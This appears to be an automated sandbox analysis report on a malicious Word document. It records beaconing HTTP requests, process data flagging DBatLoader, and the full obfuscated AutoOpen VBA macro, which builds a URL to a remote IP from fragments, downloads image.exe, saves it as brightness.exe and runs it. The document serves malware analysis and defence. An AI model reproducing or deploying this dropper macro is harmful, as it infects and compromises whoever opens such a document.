              Date: Fri, 10 Jan 2025 08:01:20 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              108192.168.2.450235166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:21.260569096 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:22.210985899 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:22 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              109192.168.2.450237166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:22.350897074 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:23.327714920 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:23 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              110192.168.2.450239166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:23.462342978 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:24.370398998 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:24 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              111192.168.2.450241166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:24.509913921 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:25.441354036 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:25 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              112192.168.2.450243166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:25.577210903 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:26.474482059 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:26 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              113192.168.2.450245166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:26.651557922 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:27.587016106 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:27 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              114192.168.2.450247166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 09:01:27.728924036 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 09:01:28.651297092 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 08:01:28 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:02:58:41
              Start date:10/01/2025
              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
              Imagebase:0x2c0000
              File size:1'620'872 bytes
              MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:7
              Start time:02:59:24
              Start date:10/01/2025
              Path:C:\Windows\SysWOW64\brightness.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\brightness.exe
              Imagebase:0x400000
              File size:1'161'216 bytes
              MD5 hash:483AB6BD562B28782D0999ABEC4F57F5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Borland Delphi
              Yara matches:
              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.3375169126.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.3359324067.00000000022D6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 75%, ReversingLabs
              Reputation:low
              Has exited:false

              Call Graph

              • Entrypoint
              • Decryption Function
              • Executed
              • Not Executed
              • Show Help
              callgraph 9 AutoOpen Shell:1,CreateObject:2,Open:1,Send:1

              Module: ThisDocument

              Declaration
              LineContent
              1

              Attribute VB_Name = "ThisDocument"

              2

              Attribute VB_Base = "1Normal.ThisDocument"

              3

              Attribute VB_GlobalNameSpace = False

              4

              Attribute VB_Creatable = False

              5

              Attribute VB_PredeclaredId = True

              6

              Attribute VB_Exposed = True

              7

              Attribute VB_TemplateDerived = True

              8

              Attribute VB_Customizable = True

              APIsMeta Information

              CreateObject

              CreateObject("MSXML2.ServerXMLHTTP")

              CreateObject

              CreateObject("Adodb.Stream")

              Open

              IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/image.exe",False)

              Send

              responsebody

              IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x06? \x00\x00?\x06?\x00?\x06\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x12?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x07?\x00 \x08? \x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x06?\x00?\x06?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x06 \x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x07\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x07?\x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x07\x00\x00?\x07\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@????\x00?\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@???c\x00? \x08? ?\x07\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00?\x12\x00\x00?\x11\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@???????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03??@???????A?\x02\x00\x00\xfffd\x00\x00???????????P????P????P???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G????\x00?????I??????????G???G???G???G???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????G??????????G????????????\x00???\x03????\x03???G????????????G?????\x00????G?\x00????????G???????????-?????????\x0b???????????\x00?????G??????G?????????h\x10?\x00\x14j?????????????G????\xfffd?????\x02\x00??????????G??????????????G????????????????????G????????????\x10\x01???\x00??h??j???????????????G??G??G?????\x00????????????????h????????????????\x00?????? ???G??\x00???????F????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????G??A\x00???G?j???A\x00???G????????u??G????\x00\x00?????????G??????????????????G??????\x01???????????????????G????G????\x00??????G??G???????????G???????????G????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????G?????????????????????????????G???????G??G??????????\x00???????????????????G????????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????G?\x13??????????\x00h?????????????\x13????\x02\x00??G?\x13??G??G???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????G????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??G????????\xfffd???????????????G???@????????????????????????????????|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????G????????????????????G?????????\x00??h\x10?\x00\x01j????G??G???@??????????????G???G???????????\x00?????G????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01?\x0b??????\x00?\x0b??????????G?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????G?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????G?G??G?G\xfffd\x04??G???????????????????@??????G????h?????????7\x00?

              Shell

              Shell(""brightness.exe"") -> 7972
              StringsDecrypted Strings
              "M""S""X""M""L""2"".""S""er""ver""XM""LH""TTP"
              "Ad""od""b.S""tr""ea""m"
              "h"
              "t"
              "t""p:/""/147.124.216.113/image"
              "."
              "e"
              "x"
              "e"
              "GET"
              "brightness"
              "."
              "e"
              "x"
              "e"
              """brightness"
              "."
              "e"
              "x"
              "e"""
              LineInstructionMeta Information
              9

              Sub AutoOpen()

              11

              Dim xHttp

              executed
              16

              Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")

              CreateObject("MSXML2.ServerXMLHTTP")

              executed
              18

              Dim bStrm

              20

              Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")

              CreateObject("Adodb.Stream")

              executed
              24

              Dim nirm1

              25

              nirm1 = "h"

              26

              Dim nirm2

              27

              nirm2 = "t"

              28

              Dim nirm3

              29

              nirm3 = "t" & "p:/" & "/147.124.216.113/image"

              30

              Dim nirm4

              31

              nirm4 = "."

              32

              Dim nirm5

              33

              nirm5 = "e"

              34

              Dim nirm6

              35

              nirm6 = "x"

              36

              Dim nirm7

              37

              nirm7 = "e"

              41

              Dim plpl

              42

              plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7

              45

              xHttp.Open "GET", plpl, False

              IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/image.exe",False)

              executed
              46

              xHttp.Send

              Send

              52

              With bStrm

              53

              . Type = 1

              54

              . Open

              55

              . write xHttp.responsebody

              IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x06? \x00\x00?\x06?\x00?\x06\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x12?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x07?\x00 \x08? \x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x06?\x00?\x06?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x06 \x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x07\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x07?\x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x07\x00\x00?\x07\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@????\x00?\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@???c\x00? \x08? ?\x07\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00?\x12\x00\x00?\x11\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@???????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03??@???????A?\x02\x00\x00\xfffd\x00\x00???????????P????P????P???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G????\x00?????I??????????G???G???G???G???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????G??????????G????????????\x00???\x03????\x03???G????????????G?????\x00????G?\x00????????G???????????-?????????\x0b???????????\x00?????G??????G?????????h\x10?\x00\x14j?????????????G????\xfffd?????\x02\x00??????????G??????????????G????????????????????G????????????\x10\x01???\x00??h??j???????????????G??G??G?????\x00????????????????h????????????????\x00?????? ???G??\x00???????F????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????G??A\x00???G?j???A\x00???G????????u??G????\x00\x00?????????G??????????????????G??????\x01???????????????????G????G????\x00??????G??G???????????G???????????G????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????G?????????????????????????????G???????G??G??????????\x00???????????????????G????????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????G?\x13??????????\x00h?????????????\x13????\x02\x00??G?\x13??G??G???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????G????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??G????????\xfffd???????????????G???@????????????????????????????????|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????G????????????????????G?????????\x00??h\x10?\x00\x01j????G??G???@??????????????G???G???????????\x00?????G????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01?\x0b??????\x00?\x0b??????????G?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????G?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????G?G??G?G\xfffd\x04??G???????????????????@??????G????h?????????7\x00?

              executed
              59

              Dim monu1

              60

              monu1 = "brightness"

              61

              Dim monu2

              62

              monu2 = "."

              64

              Dim monu3

              65

              monu3 = "e"

              67

              Dim monu4

              68

              monu4 = "x"

              70

              Dim monu5

              71

              monu5 = "e"

              73

              Dim monu6

              74

              monu6 = monu1 & monu2 & monu3 & monu4 & monu5

              77

              . savetofile monu6, 2

              80

              Dim parveen1

              81

              Dim parveen2

              82

              Dim parveen3

              83

              Dim parveen4

              84

              Dim praveen1

              85

              praveen1 = """brightness"

              86

              Dim praveen2

              87

              praveen2 = "."

              89

              Dim praveen3

              90

              praveen3 = "e"

              92

              Dim praveen4

              93

              praveen4 = "x"

              95

              Dim praveen5

              96

              praveen5 = "e"""

              101

              Dim praveen6

              102

              praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5

              106

              End With

              108

              Shell (praveen6)

              Shell(""brightness.exe"") -> 7972

              executed
              110

              End Sub

              Reset < >

                Execution Graph

                Execution Coverage:6.4%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:14.6%
                Total number of Nodes:268
                Total number of Limit Nodes:15
                execution_graph 25616 28f1c6c 25617 28f1c7c 25616->25617 25618 28f1d04 25616->25618 25621 28f1c89 25617->25621 25622 28f1cc0 25617->25622 25619 28f1d0d 25618->25619 25620 28f1f58 25618->25620 25623 28f1d25 25619->25623 25637 28f1e24 25619->25637 25626 28f1fec 25620->25626 25627 28f1fac 25620->25627 25628 28f1f68 25620->25628 25625 28f1c94 25621->25625 25664 28f1724 25621->25664 25624 28f1724 10 API calls 25622->25624 25630 28f1d2c 25623->25630 25634 28f1d48 25623->25634 25639 28f1dfc 25623->25639 25647 28f1cd7 25624->25647 25635 28f1fb2 25627->25635 25640 28f1724 10 API calls 25627->25640 25632 28f1724 10 API calls 25628->25632 25629 28f1e7c 25633 28f1724 10 API calls 25629->25633 25654 28f1e95 25629->25654 25636 28f1f82 25632->25636 25638 28f1f2c 25633->25638 25643 28f1d9c 25634->25643 25644 28f1d79 Sleep 25634->25644 25658 28f1a8c 8 API calls 25636->25658 25662 28f1fa7 25636->25662 25637->25629 25642 28f1e55 Sleep 25637->25642 25637->25654 25638->25654 25657 28f1a8c 8 API calls 25638->25657 25641 28f1724 10 API calls 25639->25641 25645 28f1fc1 25640->25645 25652 28f1e05 25641->25652 25642->25629 25648 28f1e6f Sleep 25642->25648 25644->25643 25649 28f1d91 Sleep 25644->25649 25659 28f1a8c 8 API calls 25645->25659 25645->25662 25646 28f1ca1 25655 28f1cb9 25646->25655 25688 28f1a8c 25646->25688 25653 28f1a8c 8 API calls 25647->25653 25656 28f1cfd 25647->25656 25648->25637 25649->25634 25651 28f1e1d 25652->25651 25661 28f1a8c 8 API calls 25652->25661 25653->25656 25660 28f1f50 25657->25660 25658->25662 25663 28f1fe4 25659->25663 25661->25651 25665 28f173c 25664->25665 25666 28f1968 25664->25666 25667 28f174e 25665->25667 25677 28f17cb Sleep 25665->25677 25668 28f1938 25666->25668 25669 28f1a80 25666->25669 25670 28f175d 25667->25670 25678 28f182c 25667->25678 25681 28f180a Sleep 25667->25681 25671 28f1986 25668->25671 25674 28f1947 Sleep 25668->25674 25672 28f1a89 25669->25672 25673 28f1684 VirtualAlloc 25669->25673 25670->25646 25683 28f15cc VirtualAlloc 25671->25683 25686 28f19a4 25671->25686 25672->25646 25675 28f16af 25673->25675 25682 28f16bf 25673->25682 25674->25671 25676 28f195d Sleep 25674->25676 25705 28f1644 25675->25705 25676->25668 25677->25667 25680 28f17e4 Sleep 25677->25680 25687 28f1838 25678->25687 25711 28f15cc 25678->25711 25680->25665 25681->25678 25684 28f1820 Sleep 25681->25684 25682->25646 25683->25686 25684->25667 25686->25646 25687->25646 25689 28f1b6c 25688->25689 25690 28f1aa1 25688->25690 25691 28f1aa7 25689->25691 25694 28f16e8 25689->25694 25690->25691 25692 28f1b13 Sleep 25690->25692 25693 28f1ab0 25691->25693 25697 28f1b4b Sleep 25691->25697 25702 28f1b81 25691->25702 25692->25691 25696 28f1b2d Sleep 25692->25696 25693->25655 25695 28f1c66 25694->25695 25698 28f1644 2 API calls 25694->25698 25695->25655 25696->25690 25699 28f1b61 Sleep 25697->25699 25697->25702 25700 28f16f5 VirtualFree 25698->25700 25699->25691 25701 28f170d 25700->25701 25701->25655 25703 28f1c00 VirtualFree 25702->25703 25704 28f1ba4 25702->25704 25703->25655 25704->25655 25706 28f1681 25705->25706 25707 28f164d 25705->25707 25706->25682 25707->25706 25708 28f164f Sleep 25707->25708 25709 28f1664 25708->25709 25709->25706 25710 28f1668 Sleep 25709->25710 25710->25707 25715 28f1560 25711->25715 25713 28f15d4 VirtualAlloc 25714 28f15eb 25713->25714 25714->25687 25716 28f1500 25715->25716 25716->25713 25717 28f4c48 25718 28f4c6f 25717->25718 25719 28f4c4c 25717->25719 25720 28f4c0c 25719->25720 25721 28f4c5f SysReAllocStringLen 25719->25721 25722 28f4c12 SysFreeString 25720->25722 25723 28f4c20 25720->25723 25721->25718 25724 28f4bdc 25721->25724 25722->25723 25725 28f4bf8 25724->25725 25726 28f4be8 SysAllocStringLen 25724->25726 25726->25724 25726->25725 25727 291bf78 25730 290f0a8 25727->25730 25731 290f0b0 25730->25731 25731->25731 28916 2908704 LoadLibraryW 25731->28916 25733 290f0d2 28921 28f2ee0 QueryPerformanceCounter 25733->28921 25735 290f0d7 25736 290f0e1 InetIsOffline 25735->25736 25737 290f0eb 25736->25737 25738 290f0fc 25736->25738 28933 28f4500 25737->28933 25740 28f4500 11 API calls 25738->25740 25741 290f0fa 25740->25741 28924 28f480c 25741->28924 28939 29080c0 28916->28939 28918 290873d 28950 2907cf8 28918->28950 28922 28f2eed 28921->28922 28923 28f2ef8 GetTickCount 28921->28923 28922->25735 28923->25735 28925 28f481d 28924->28925 28926 28f485a 28925->28926 28927 28f4843 28925->28927 28929 28f4570 11 API calls 28926->28929 28928 28f4b78 11 API calls 28927->28928 28930 28f4850 28928->28930 28929->28930 28931 28f488b 28930->28931 28932 28f4500 11 API calls 28930->28932 28932->28931 28934 28f4504 28933->28934 28935 28f4514 28933->28935 28934->28935 28937 28f4570 11 API calls 28934->28937 28936 28f4542 28935->28936 29024 28f2c2c 11 API calls 28935->29024 28936->25741 28937->28935 28940 28f4500 11 API calls 28939->28940 28941 29080e5 28940->28941 28964 290790c 28941->28964 28945 29080ff 28946 2908107 GetModuleHandleW GetProcAddress GetProcAddress 28945->28946 28947 290813a 28946->28947 28985 28f44d0 28947->28985 28951 28f4500 11 API calls 28950->28951 28952 2907d1d 28951->28952 28953 290790c 12 API calls 28952->28953 28954 2907d2a 28953->28954 28955 28f4798 11 API calls 28954->28955 28956 2907d3a 28955->28956 29013 2908018 28956->29013 28959 29080c0 15 API calls 28960 2907d53 NtWriteVirtualMemory 28959->28960 28961 2907d7f 28960->28961 28962 28f44d0 11 API calls 28961->28962 